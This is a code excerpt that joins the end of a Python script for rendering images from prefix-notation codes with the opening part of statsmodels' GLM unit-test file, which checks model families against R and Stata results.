arity = arity_dict[sym]
if arity == 0:
stack.append(sym)
else:
code = [sym]
for i in range(arity):
code.append(stack.pop())
stack.append(code)
return stack.pop()
def compute_prefix_mismatch(prefix_list, arity_dict):
mismatch = 1 # Initially, we have one "open node" in the root.
for sym in prefix_list:
if sym not in arity_dict:
raise ValueError("Unsupported symbol '%s' in '%s'." % (sym, prefix_list))
arity = arity_dict[sym]
mismatch += arity - 1
return mismatch
def from_prefix_notation_family_1(prefix_notation_str):
return from_prefix_notation(prefix_notation_str, arity_dict_family_1, W)
def test_img_code(img_code):
prefix_code = to_prefix_notation(img_code)
test_code, mismatch = from_prefix_notation_family_1(prefix_code)
if str(test_code) == str(img_code) and mismatch == 0:
print('OK: %s' % test_code)
else:
raise ValueError('TEST FAILED!')
def main_test_sort():
for row in sorted([('abc', 12.1), ('cde', 120.1), ('efg', 1.21)], key=lambda r: -r[1]):
print(row)
def main_test():
print(from_prefix_notation_family_1("W"))
print(from_prefix_notation_family_1("B"))
print(from_prefix_notation_family_1("h"))
print(from_prefix_notation_family_1("h v B h B"))
print(from_prefix_notation_family_1("h v B h B W W W B B B"))
examples = make_hand_crafted_examples()
for code in examples:
test_img_code(code)
img_size = (256, 256)
elephant = examples[2]
simpler_elephant = examples[3]
im1 = render_to_img(img_size, elephant)
im2 = render_to_img(img_size, simpler_elephant)
i1 = np.array(im1).astype(float)
i2 = np.array(im2).astype(float)
diff = np.abs(i1 - i2)
err = np.sum(diff) / (3 * img_size[0] * img_size[1] * 255)
print(float(err))
im1.show()
im2.show()
diff = ImageMath.eval("abs(a - b)", a=im1.convert('L'), b=im2.convert('L'))
diff.show()
def robust_err(input_img_path, output_prefix_notation_str):
im1 = Image.open(input_img_path)
corrected_code, mismatch = from_prefix_notation_family_1(output_prefix_notation_str)
im2 = render_to_img(im1.size, corrected_code)
return imgs_err(im1, im2)
def codes_err(code1, code2, img_size):
im1 = render_to_img(img_size, code1)
im2 = render_to_img(img_size, code2)
return imgs_err(im1, im2)
def imgs_err(im1, im2):
if im1.size != im2.size:
raise ValueError("Images must have the same size.")
i1 = np.array(im1).astype(float)
i2 = np.array(im2).astype(float)
diff = np.abs(i1 - i2)
err = np.sum(diff) / (3 * im1.size[0] * im1.size[1] * 255)
return float(err)
if __name__ == '__main__':
# main()
# main_nn()
# main_test_nn()
# main_test()
# =-> main_process_results()
# test_histogram()
main_prepare_experiment()
# test_big_image()
|
<filename>statsmodels/genmod/tests/test_glm.py
"""
Test functions for models.GLM
"""
import warnings
import os
import numpy as np
from numpy.testing import (assert_almost_equal, assert_equal, assert_raises,
assert_allclose, assert_, assert_array_less)
import pandas as pd
from pandas.testing import assert_series_equal
import pytest
from scipy import stats
import statsmodels.api as sm
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.tools.tools import add_constant
from statsmodels.tools.sm_exceptions import PerfectSeparationError
from statsmodels.discrete import discrete_model as discrete
from statsmodels.tools.sm_exceptions import DomainWarning
from statsmodels.tools.numdiff import approx_fprime, approx_hess
from statsmodels.datasets import cpunish
# Test Precisions
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
DECIMAL_0 = 0
pdf_output = False
if pdf_output:
from matplotlib.backends.backend_pdf import PdfPages
pdf = PdfPages("test_glm.pdf")
else:
pdf = None
def close_or_save(pdf, fig):
if pdf_output:
pdf.savefig(fig)
def teardown_module():
if pdf_output:
pdf.close()
class CheckModelResultsMixin(object):
'''
res2 should be either the results from RModelWrap
or the results as defined in model_results_data
'''
decimal_params = DECIMAL_4
def test_params(self):
assert_almost_equal(self.res1.params, self.res2.params,
self.decimal_params)
decimal_bse = DECIMAL_4
def test_standard_errors(self):
assert_allclose(self.res1.bse, self.res2.bse,
atol=10**(-self.decimal_bse), rtol=1e-5)
decimal_resids = DECIMAL_4
def test_residuals(self):
# fix incorrect numbers in resid_working results
# residuals for Poisson are also tested in test_glm_weights.py
import copy
# new numpy would have copy method
resid2 = copy.copy(self.res2.resids)
resid2[:, 2] *= self.res1.family.link.deriv(self.res1.mu)**2
atol = 10**(-self.decimal_resids)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=FutureWarning)
resid_a = self.res1.resid_anscombe
resids = np.column_stack((self.res1.resid_pearson,
self.res1.resid_deviance, self.res1.resid_working,
resid_a, self.res1.resid_response))
assert_allclose(resids, resid2, rtol=1e-6, atol=atol)
decimal_aic_R = DECIMAL_4
def test_aic_R(self):
# R includes the estimation of the scale as a lost dof
# Does not with Gamma though
if self.res1.scale != 1:
dof = 2
else:
dof = 0
if isinstance(self.res1.model.family, (sm.families.NegativeBinomial)):
llf = self.res1.model.family.loglike(self.res1.model.endog,
self.res1.mu,
self.res1.model.var_weights,
self.res1.model.freq_weights,
scale=1)
aic = (-2*llf+2*(self.res1.df_model+1))
else:
aic = self.res1.aic
assert_almost_equal(aic+dof, self.res2.aic_R,
self.decimal_aic_R)
decimal_aic_Stata = DECIMAL_4
def test_aic_Stata(self):
# Stata uses the below llf for aic definition for these families
if isinstance(self.res1.model.family, (sm.families.Gamma,
sm.families.InverseGaussian,
sm.families.NegativeBinomial)):
llf = self.res1.model.family.loglike(self.res1.model.endog,
self.res1.mu,
self.res1.model.var_weights,
self.res1.model.freq_weights,
scale=1)
aic = (-2*llf+2*(self.res1.df_model+1))/self.res1.nobs
else:
aic = self.res1.aic/self.res1.nobs
assert_almost_equal(aic, self.res2.aic_Stata, self.decimal_aic_Stata)
decimal_deviance = DECIMAL_4
def test_deviance(self):
assert_almost_equal(self.res1.deviance, self.res2.deviance,
self.decimal_deviance)
decimal_scale = DECIMAL_4
def test_scale(self):
assert_almost_equal(self.res1.scale, self.res2.scale,
self.decimal_scale)
decimal_loglike = DECIMAL_4
def test_loglike(self):
# Stata uses the below llf for these families
# We differ with R for them
if isinstance(self.res1.model.family, (sm.families.Gamma,
sm.families.InverseGaussian,
sm.families.NegativeBinomial)):
llf = self.res1.model.family.loglike(self.res1.model.endog,
self.res1.mu,
self.res1.model.var_weights,
self.res1.model.freq_weights,
scale=1)
else:
llf = self.res1.llf
assert_almost_equal(llf, self.res2.llf, self.decimal_loglike)
decimal_null_deviance = DECIMAL_4
def test_null_deviance(self):
assert_almost_equal(self.res1.null_deviance, self.res2.null_deviance,
self.decimal_null_deviance)
decimal_bic = DECIMAL_4
def test_bic(self):
assert_almost_equal(self.res1.bic, self.res2.bic_Stata,
self.decimal_bic)
def test_degrees(self):
assert_equal(self.res1.model.df_resid,self.res2.df_resid)
decimal_fittedvalues = DECIMAL_4
def test_fittedvalues(self):
assert_almost_equal(self.res1.fittedvalues, self.res2.fittedvalues,
self.decimal_fittedvalues)
def test_tpvalues(self):
# test comparing tvalues and pvalues with normal implementation
# make sure they use normal distribution (inherited in results class)
params = self.res1.params
tvalues = params / self.res1.bse
pvalues = stats.norm.sf(np.abs(tvalues)) * 2
half_width = stats.norm.isf(0.025) * self.res1.bse
conf_int = np.column_stack((params - half_width, params + half_width))
if isinstance(tvalues, pd.Series):
assert_series_equal(self.res1.tvalues, tvalues)
else:
assert_almost_equal(self.res1.tvalues, tvalues)
assert_almost_equal(self.res1.pvalues, pvalues)
assert_almost_equal(self.res1.conf_int(), conf_int)
def test_pearson_chi2(self):
if hasattr(self.res2, 'pearson_chi2'):
assert_allclose(self.res1.pearson_chi2, self.res2.pearson_chi2,
atol=1e-6, rtol=1e-6)
@pytest.mark.smoke
def test_summary(self):
self.res1.summary()
@pytest.mark.smoke
def test_summary2(self):
self.res1.summary2()
class CheckComparisonMixin(object):
def test_compare_discrete(self):
res1 = self.res1
resd = self.resd
assert_allclose(res1.llf, resd.llf, rtol=1e-10)
score_obs1 = res1.model.score_obs(res1.params * 0.98)
score_obsd = resd.model.score_obs(resd.params * 0.98)
assert_allclose(score_obs1, score_obsd, rtol=1e-10)
# score
score1 = res1.model.score(res1.params * 0.98)
assert_allclose(score1, score_obs1.sum(0), atol=1e-20)
score0 = res1.model.score(res1.params)
assert_allclose(score0, np.zeros(score_obs1.shape[1]), atol=5e-7)
hessian1 = res1.model.hessian(res1.params * 0.98, observed=False)
hessiand = resd.model.hessian(resd.params * 0.98)
assert_allclose(hessian1, hessiand, rtol=1e-10)
hessian1 = res1.model.hessian(res1.params * 0.98, observed=True)
hessiand = resd.model.hessian(resd.params * 0.98)
assert_allclose(hessian1, hessiand, rtol=1e-9)
def test_score_test(self):
res1 = self.res1
# fake example, should be zero, k_constraint should be 0
st, pv, df = res1.model.score_test(res1.params, k_constraints=1)
assert_allclose(st, 0, atol=1e-20)
assert_allclose(pv, 1, atol=1e-10)
assert_equal(df, 1)
st, pv, df = res1.model.score_test(res1.params, k_constraints=0)
assert_allclose(st, 0, atol=1e-20)
assert_(np.isnan(pv), msg=repr(pv))
assert_equal(df, 0)
# TODO: no verified numbers largely SMOKE test
exog_extra = res1.model.exog[:,1]**2
st, pv, df = res1.model.score_test(res1.params, exog_extra=exog_extra)
assert_array_less(0.1, st)
assert_array_less(0.1, pv)
assert_equal(df, 1)
class TestGlmGaussian(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Test Gaussian family with canonical identity link
'''
# Test Precisions
cls.decimal_resids = DECIMAL_3
cls.decimal_params = DECIMAL_2
cls.decimal_bic = DECIMAL_0
cls.decimal_bse = DECIMAL_3
from statsmodels.datasets.longley import load
cls.data = load(as_pandas=False)
cls.data.exog = add_constant(cls.data.exog, prepend=False)
cls.res1 = GLM(cls.data.endog, cls.data.exog,
family=sm.families.Gaussian()).fit()
from .results.results_glm import Longley
cls.res2 = Longley()
def test_compare_OLS(self):
res1 = self.res1
# OLS does not define score_obs
from statsmodels.regression.linear_model import OLS
resd = OLS(self.data.endog, self.data.exog).fit()
self.resd = resd # attach to access from the outside
assert_allclose(res1.llf, resd.llf, rtol=1e-10)
score_obs1 = res1.model.score_obs(res1.params, scale=None)
score_obsd = resd.resid[:, None] / resd.scale * resd.model.exog
# low precision because of badly scaled exog
assert_allclose(score_obs1, score_obsd, rtol=1e-8)
score_obs1 = res1.model.score_obs(res1.params, scale=1)
score_obsd = resd.resid[:, None] * resd.model.exog
assert_allclose(score_obs1, score_obsd, rtol=1e-8)
hess_obs1 = res1.model.hessian(res1.params, scale=None)
hess_obsd = -1. / resd.scale * resd.model.exog.T.dot(resd.model.exog)
# low precision because of badly scaled exog
assert_allclose(hess_obs1, hess_obsd, rtol=1e-8)
# FIXME: enable or delete
# def setup(self):
# if skipR:
# raise SkipTest, "Rpy not installed."
# Gauss = r.gaussian
# self.res2 = RModel(self.data.endog, self.data.exog, r.glm, family=Gauss)
# self.res2.resids = np.array(self.res2.resid)[:,None]*np.ones((1,5))
# self.res2.null_deviance = 185008826 # taken from R. Rpy bug?
class TestGlmGaussianGradient(TestGlmGaussian):
@classmethod
def setup_class(cls):
'''
Test Gaussian family with canonical identity link
'''
# Test Precisions
cls.decimal_resids = DECIMAL_3
cls.decimal_params = DECIMAL_2
cls.decimal_bic = DECIMAL_0
cls.decimal_bse = DECIMAL_2
from statsmodels.datasets.longley import load
cls.data = load(as_pandas=False)
cls.data.exog = add_constant(cls.data.exog, prepend=False)
cls.res1 = GLM(cls.data.endog, cls.data.exog,
family=sm.families.Gaussian()).fit(method='bfgs')
from .results.results_glm import Longley
cls.res2 = Longley()
class TestGaussianLog(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precision
cls.decimal_aic_R = DECIMAL_0
cls.decimal_aic_Stata = DECIMAL_2
cls.decimal_loglike = DECIMAL_0
cls.decimal_null_deviance = DECIMAL_1
nobs = 100
x = np.arange(nobs)
np.random.seed(54321)
# y = 1.0 - .02*x - .001*x**2 + 0.001 * np.random.randn(nobs)
cls.X = np.c_[np.ones((nobs,1)),x,x**2]
cls.lny = np.exp(-(-1.0 + 0.02*x + 0.0001*x**2)) +\
0.001 * np.random.randn(nobs)
GaussLog_Model = GLM(cls.lny, cls.X,
family=sm.families.Gaussian(sm.families.links.log()))
cls.res1 = GaussLog_Model.fit()
from .results.results_glm import GaussianLog
cls.res2 = GaussianLog()
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed"
# GaussLogLink = r.gaussian(link = "log")
# GaussLog_Res_R = RModel(cls.lny, cls.X, r.glm, family=GaussLogLink)
# cls.res2 = GaussLog_Res_R
class TestGaussianInverse(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precisions
cls.decimal_bic = DECIMAL_1
cls.decimal_aic_R = DECIMAL_1
cls.decimal_aic_Stata = DECIMAL_3
cls.decimal_loglike = DECIMAL_1
cls.decimal_resids = DECIMAL_3
nobs = 100
x = np.arange(nobs)
np.random.seed(54321)
y = 1.0 + 2.0 * x + x**2 + 0.1 * np.random.randn(nobs)
cls.X = np.c_[np.ones((nobs,1)),x,x**2]
cls.y_inv = (1. + .02*x + .001*x**2)**-1 + .001 * np.random.randn(nobs)
InverseLink_Model = GLM(cls.y_inv, cls.X,
family=sm.families.Gaussian(sm.families.links.inverse_power()))
InverseLink_Res = InverseLink_Model.fit()
cls.res1 = InverseLink_Res
from .results.results_glm import GaussianInverse
cls.res2 = GaussianInverse()
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed."
# InverseLink = r.gaussian(link = "inverse")
# InverseLink_Res_R = RModel(cls.y_inv, cls.X, r.glm, family=InverseLink)
# cls.res2 = InverseLink_Res_R
class TestGlmBinomial(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Test Binomial family with canonical logit link using star98 dataset.
'''
cls.decimal_resids = DECIMAL_1
cls.decimal_bic = DECIMAL_2
from statsmodels.datasets.star98 import load
from .results.results_glm import Star98
data = load(as_pandas=False)
data.exog = add_constant(data.exog, prepend=False)
cls.res1 = GLM(data.endog, data.exog,
family=sm.families.Binomial()).fit()
# NOTE: if you want to replicate with RModel
# res2 = RModel(data.endog[:,0]/trials, data.exog, r.glm,
# family=r.binomial, weights=trials)
cls.res2 = Star98()
def test_endog_dtype(self):
from statsmodels.datasets.star98 import load
data = load(as_pandas=False)
data.exog = add_constant(data.exog, prepend=False)
endog = data.endog.astype(np.int)
res2 = GLM(endog, data.exog, family=sm.families.Binomial()).fit()
assert_allclose(res2.params, self.res1.params)
endog = data.endog.astype(np.double)
res3 = GLM(endog, data.exog, family=sm.families.Binomial()).fit()
assert_allclose(res3.params, self.res1.params)
def test_invalid_endog(self, reset_randomstate):
# GH2733 inspired check
endog = np.random.randint(0, 100, size=(1000, 3))
exog = np.random.standard_normal((1000, 2))
with pytest.raises(ValueError, match='endog has more than 2 columns'):
GLM(endog, exog, family=sm.families.Binomial())
def test_invalid_endog_formula(self, reset_randomstate):
# GH2733
n = 200
exog = np.random.normal(size=(n, 2))
endog = np.random.randint(0, 3, size=n).astype(str)
# formula interface
data = pd.DataFrame({"y": endog, "x1": exog[:, 0], "x2": exog[:, 1]})
with pytest.raises(ValueError, match='array with multiple columns'):
sm.GLM.from_formula("y ~ x1 + x2", data,
family=sm.families.Binomial())
# FIXME: enable/xfail/skip or delete
# TODO:
# Non-Canonical Links for the Binomial family require the algorithm to be
# slightly changed
# class TestGlmBinomialLog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLogit(CheckModelResultsMixin):
# pass
# class TestGlmBinomialProbit(CheckModelResultsMixin):
# pass
# class TestGlmBinomialCloglog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialPower(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLoglog(CheckModelResultsMixin):
# pass
# class TestGlmBinomialLogc(CheckModelResultsMixin):
# TODO: need include logc link
# pass
class TestGlmBernoulli(CheckModelResultsMixin, CheckComparisonMixin):
@classmethod
def setup_class(cls):
from .results.results_glm import Lbw
cls.res2 = Lbw()
cls.res1 = GLM(cls.res2.endog, cls.res2.exog,
family=sm.families.Binomial()).fit()
modd = discrete.Logit(cls.res2.endog, cls.res2.exog)
cls.resd = modd.fit(start_params=cls.res1.params * 0.9, disp=False)
def test_score_r(self):
res1 = self.res1
res2 = self.res2
st, pv, df = res1.model.score_test(res1.params,
exog_extra=res1.model.exog[:, 1]**2)
st_res = 0.2837680293459376 # (-0.5326988167303712)**2
assert_allclose(st, st_res, rtol=1e-4)
st, pv, df = res1.model.score_test(res1.params,
exog_extra=res1.model.exog[:, 0]**2)
st_res = 0.6713492821514992 # (-0.8193590679009413)**2
assert_allclose(st, st_res, rtol=1e-4)
select = list(range(9))
select.pop(7)
res1b = GLM(res2.endog, res2.exog.iloc[:, select],
family=sm.families.Binomial()).fit()
tres = res1b.model.score_test(res1b.params,
exog_extra=res1.model.exog[:, -2])
tres = np.asarray(tres[:2]).ravel()
tres_r = (2.7864148487452, 0.0950667)
assert_allclose(tres, tres_r, rtol=1e-4)
cmd_r = """\
data = read.csv("...statsmodels\\statsmodels\\genmod\\tests\\results\\stata_lbw_glm.csv")
data["race_black"] = data["race"] == "black"
data["race_other"] = data["race"] == "other"
mod = glm(low ~ age + lwt + race_black + race_other + smoke + ptl + ht + ui, family=binomial, data=data)
options(digits=16)
anova(mod, test="Rao")
library(statmod)
s = glm.scoretest(mod, data["age"]**2)
s**2
s = glm.scoretest(mod, data["lwt"]**2)
s**2
"""
# class TestGlmBernoulliIdentity(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliLog(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliProbit(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliCloglog(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliPower(CheckModelResultsMixin):
# pass
# class TestGlmBernoulliLoglog(CheckModelResultsMixin):
# pass
# class test_glm_bernoulli_logc(CheckModelResultsMixin):
# pass
class TestGlmGamma(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Tests Gamma family with canonical inverse link (power -1)
'''
# Test Precisions
cls.decimal_aic_R = -1 #TODO: off by about 1, we are right with Stata
cls.decimal_resids = DECIMAL_2
from statsmodels.datasets.scotland import load
from .results.results_glm import Scotvote
data = load(as_pandas=False)
data.exog = add_constant(data.exog, prepend=False)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
res1 = GLM(data.endog, data.exog,
family=sm.families.Gamma()).fit()
cls.res1 = res1
# res2 = RModel(data.endog, data.exog, r.glm, family=r.Gamma)
res2 = Scotvote()
res2.aic_R += 2 # R does not count degree of freedom for scale with gamma
cls.res2 = res2
class TestGlmGammaLog(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precisions
cls.decimal_resids = DECIMAL_3
cls.decimal_aic_R = DECIMAL_0
cls.decimal_fittedvalues = DECIMAL_3
from .results.results_glm import CancerLog
res2 = CancerLog()
cls.res1 = GLM(res2.endog, res2.exog,
family=sm.families.Gamma(link=sm.families.links.log())).fit()
cls.res2 = res2
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed."
# cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
# family=r.Gamma(link="log"))
# cls.res2.null_deviance = 27.92207137420696 # From R (bug in rpy)
# cls.res2.bic = -154.1582089453923 # from Stata
class TestGlmGammaIdentity(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precisions
cls.decimal_resids = -100 #TODO Very off from Stata?
cls.decimal_params = DECIMAL_2
cls.decimal_aic_R = DECIMAL_0
cls.decimal_loglike = DECIMAL_1
from .results.results_glm import CancerIdentity
res2 = CancerIdentity()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fam = sm.families.Gamma(link=sm.families.links.identity())
cls.res1 = GLM(res2.endog, res2.exog, family=fam).fit()
cls.res2 = res2
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed."
# cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
# family=r.Gamma(link="identity"))
# cls.res2.null_deviance = 27.92207137420696 # from R, Rpy bug
class TestGlmPoisson(CheckModelResultsMixin, CheckComparisonMixin):
@classmethod
def setup_class(cls):
'''
Tests Poisson family with canonical log link.
Test results were obtained by R.
'''
from .results.results_glm import Cpunish
cls.data = cpunish.load(as_pandas=False)
cls.data.exog[:, 3] = np.log(cls.data.exog[:, 3])
cls.data.exog = add_constant(cls.data.exog, prepend=False)
cls.res1 = GLM(cls.data.endog, cls.data.exog,
family=sm.families.Poisson()).fit()
cls.res2 = Cpunish()
# compare with discrete, start close to save time
modd = discrete.Poisson(cls.data.endog, cls.data.exog)
cls.resd = modd.fit(start_params=cls.res1.params * 0.9, disp=False)
#class TestGlmPoissonIdentity(CheckModelResultsMixin):
# pass
#class TestGlmPoissonPower(CheckModelResultsMixin):
# pass
class TestGlmInvgauss(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Tests the Inverse Gaussian family in GLM.
Notes
-----
Used the rndivgx.ado file provided by Hardin and Hilbe to
generate the data. Results are read from model_results, which
were obtained by running R_ig.s
'''
# Test Precisions
cls.decimal_aic_R = DECIMAL_0
cls.decimal_loglike = DECIMAL_0
from .results.results_glm import InvGauss
res2 = InvGauss()
res1 = GLM(res2.endog, res2.exog, \
family=sm.families.InverseGaussian()).fit()
cls.res1 = res1
cls.res2 = res2
class TestGlmInvgaussLog(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precisions
cls.decimal_aic_R = -10 # Big difference vs R.
cls.decimal_resids = DECIMAL_3
from .results.results_glm import InvGaussLog
res2 = InvGaussLog()
cls.res1 = GLM(res2.endog, res2.exog,
family=sm.families.InverseGaussian(
link=sm.families.links.log())).fit()
cls.res2 = res2
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed."
# cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
# family=r.inverse_gaussian(link="log"))
# cls.res2.null_deviance = 335.1539777981053 # from R, Rpy bug
# cls.res2.llf = -12162.72308 # from Stata, R's has big rounding diff
class TestGlmInvgaussIdentity(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
# Test Precisions
cls.decimal_aic_R = -10 #TODO: Big difference vs R
cls.decimal_fittedvalues = DECIMAL_3
cls.decimal_params = DECIMAL_3
from .results.results_glm import Medpar1
data = Medpar1()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
cls.res1 = GLM(data.endog, data.exog,
family=sm.families.InverseGaussian(
link=sm.families.links.identity())).fit()
from .results.results_glm import InvGaussIdentity
cls.res2 = InvGaussIdentity()
# FIXME: enable or delete
# def setup(cls):
# if skipR:
# raise SkipTest, "Rpy not installed."
# cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
# family=r.inverse_gaussian(link="identity"))
# cls.res2.null_deviance = 335.1539777981053 # from R, Rpy bug
# cls.res2.llf = -12163.25545 # from Stata, big diff with R
class TestGlmNegbinomial(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Test Negative Binomial family with log link
'''
# Test Precision
cls.decimal_resid = DECIMAL_1
cls.decimal_params = DECIMAL_3
cls.decimal_resids = -1 # 1 % mismatch at 0
cls.decimal_fittedvalues = DECIMAL_1
from statsmodels.datasets.committee import load
cls.data = load(as_pandas=False)
cls.data.exog[:,2] = np.log(cls.data.exog[:,2])
interaction = cls.data.exog[:,2]*cls.data.exog[:,1]
cls.data.exog = np.column_stack((cls.data.exog,interaction))
cls.data.exog = add_constant(cls.data.exog, prepend=False)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DomainWarning)
fam = sm.families.NegativeBinomial()
cls.res1 = GLM(cls.data.endog, cls.data.exog,
family=fam).fit(scale='x2')
from .results.results_glm import Committee
res2 = Committee()
res2.aic_R += 2 # They do not count a degree of freedom for the scale
cls.res2 = res2
# FIXME: enable or delete
# def setup(self):
# if skipR:
# raise SkipTest, "Rpy not installed"
# r.library('MASS') # this does not work when done in rmodelwrap?
# self.res2 = RModel(self.data.endog, self.data.exog, r.glm,
# family=r.negative_binomial(1))
# self.res2.null_deviance = 27.8110469364343
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_log(CheckModelResultsMixin):
# pass
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_power(CheckModelResultsMixin):
# pass
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_nbinom(CheckModelResultsMixin):
# pass
class TestGlmPoissonOffset(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
from .results.results_glm import Cpunish_offset
cls.decimal_params = DECIMAL_4
cls.decimal_bse = DECIMAL_4
cls.decimal_aic_R = 3
data = cpunish.load(as_pandas=False)
data.exog[:, 3] = np.log(data.exog[:, 3])
data.exog = add_constant(data.exog, prepend=True)
exposure = [100] * len(data.endog)
cls.data = data
cls.exposure = exposure
cls.res1 = GLM(data.endog, data.exog, family=sm.families.Poisson(),
exposure=exposure).fit()
cls.res2 = Cpunish_offset()
def test_missing(self):
# make sure offset is dropped correctly
endog = self.data.endog.copy()
endog[[2,4,6,8]] = np.nan
mod = GLM(endog, self.data.exog, family=sm.families.Poisson(),
exposure=self.exposure, missing='drop')
assert_equal(mod.exposure.shape[0], 13)
def test_offset_exposure(self):
# exposure=x and offset=log(x) should have the same effect
np.random.seed(382304)
endog = np.random.randint(0, 10, 100)
exog = np.random.normal(size=(100,3))
exposure = np.random.uniform(1, 2, 100)
offset = np.random.uniform(1, 2, 100)
mod1 = GLM(endog, exog, family=sm.families.Poisson(),
offset=offset, exposure=exposure).fit()
offset2 = offset + np.log(exposure)
mod2 = GLM(endog, exog, family=sm.families.Poisson(),
offset=offset2).fit()
assert_almost_equal(mod1.params, mod2.params)
assert_allclose(mod1.null, mod2.null, rtol=1e-10)
# test recreating model
mod1_ = mod1.model
kwds = mod1_._get_init_kwds()
assert_allclose(kwds['exposure'], exposure, rtol=1e-14)
assert_allclose(kwds['offset'], mod1_.offset, rtol=1e-14)
mod3 = mod1_.__class__(mod1_.endog, mod1_.exog, **kwds)
assert_allclose(mod3.exposure, mod1_.exposure, rtol=1e-14)
assert_allclose(mod3.offset, mod1_.offset, rtol=1e-14)
# test fit_regularized exposure, see #4605
resr1 = mod1.model.fit_regularized()
resr2 = mod2.model.fit_regularized()
assert_allclose(resr1.params, resr2.params, rtol=1e-10)
def test_predict(self):
np.random.seed(382304)
endog = np.random.randint(0, 10, 100)
exog = np.random.normal(size=(100,3))
exposure = np.random.uniform(1, 2, 100)
mod1 = GLM(endog, exog, family=sm.families.Poisson(),
exposure=exposure).fit()
exog1 = np.random.normal(size=(10,3))
exposure1 = np.random.uniform(1, 2, 10)
# Doubling exposure time should double expected response
pred1 = mod1.predict(exog=exog1, exposure=exposure1)
pred2 = mod1.predict(exog=exog1, exposure=2*exposure1)
assert_almost_equal(pred2, 2*pred1)
# Check exposure defaults
pred3 = mod1.predict()
pred4 = mod1.predict(exposure=exposure)
pred5 = mod1.predict(exog=exog, exposure=exposure)
assert_almost_equal(pred3, pred4)
assert_almost_equal(pred4, pred5)
# Check offset defaults
offset = np.random.uniform(1, 2, 100)
mod2 = GLM(endog, exog, offset=offset, family=sm.families.Poisson()).fit()
pred1 = mod2.predict()
pred2 = mod2.predict(offset=offset)
pred3 = mod2.predict(exog=exog, offset=offset)
assert_almost_equal(pred1, pred2)
assert_almost_equal(pred2, pred3)
# Check that offset shifts the linear predictor
mod3 = GLM(endog, exog, family=sm.families.Poisson()).fit()
offset = np.random.uniform(1, 2, 10)
pred1 = mod3.predict(exog=exog1, offset=offset, linear=True)
pred2 = mod3.predict(exog=exog1, offset=2*offset, linear=True)
assert_almost_equal(pred2, pred1+offset)
def test_perfect_pred():
cur_dir = os.path.dirname(os.path.abspath(__file__))
iris = np.genfromtxt(os.path.join(cur_dir, 'results', 'iris.csv'),
delimiter=",", skip_header=1)
y = iris[:, -1]
X = iris[:, :-1]
X = X[y != 2]
y = y[y != 2]
X = add_constant(X, prepend=True)
glm = GLM(y, X, family=sm.families.Binomial())
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
assert_raises(PerfectSeparationError, glm.fit)
def test_score_test_ols():
# nicer example than Longley
from statsmodels.regression.linear_model import OLS
np.random.seed(5)
nobs = 100
sige = 0.5
x = np.random.uniform(0, 1, size=(nobs, 5))
x[:, 0] = 1
beta = 1. / np.arange(1., x.shape[1] + 1)
y = x.dot(beta) + sige * np.random.randn(nobs)
res_ols = OLS(y, x).fit()
res_olsc = OLS(y, x[:, :-2]).fit()
co = res_ols.compare_lm_test(res_olsc, demean=False)
res_glm = GLM(y, x[:, :-2], family=sm.families.Gaussian()).fit()
co2 = res_glm.model.score_test(res_glm.params, exog_extra=x[:, -2:])
# difference in df_resid versus nobs in scale see #1786
assert_allclose(co[0] * 97 / 100., co2[0], rtol=1e-13)
def test_attribute_writable_resettable():
# Regression test for mutables and class constructors.
data = sm.datasets.longley.load(as_pandas=False)
endog, exog = data.endog, data.exog
glm_model = sm.GLM(endog, exog)
assert_equal(glm_model.family.link.power, 1.0)
glm_model.family.link.power = 2.
assert_equal(glm_model.family.link.power, 2.0)
glm_model2 = sm.GLM(endog, exog)
assert_equal(glm_model2.family.link.power, 1.0)
class TestStartParams(CheckModelResultsMixin):
@classmethod
def setup_class(cls):
'''
Test Gaussian family with canonical identity link
'''
# Test Precisions
cls.decimal_resids = DECIMAL_3
cls.decimal_params = DECIMAL_2
cls.decimal_bic = DECIMAL_0
cls.decimal_bse = DECIMAL_3
from statsmodels.datasets.longley import load
cls.data = load(as_pandas=False)
cls.data.exog = add_constant(cls.data.exog, prepend=False)
params = sm.OLS(cls.data.endog, cls.data.exog).fit().params
cls.res1 = GLM(cls.data.endog, cls.data.exog,
family=sm.families.Gaussian()).fit(start_params=params)
from .results.results_glm import Longley
cls.res2 = Longley()
def test_glm_start_params():
# see 1604
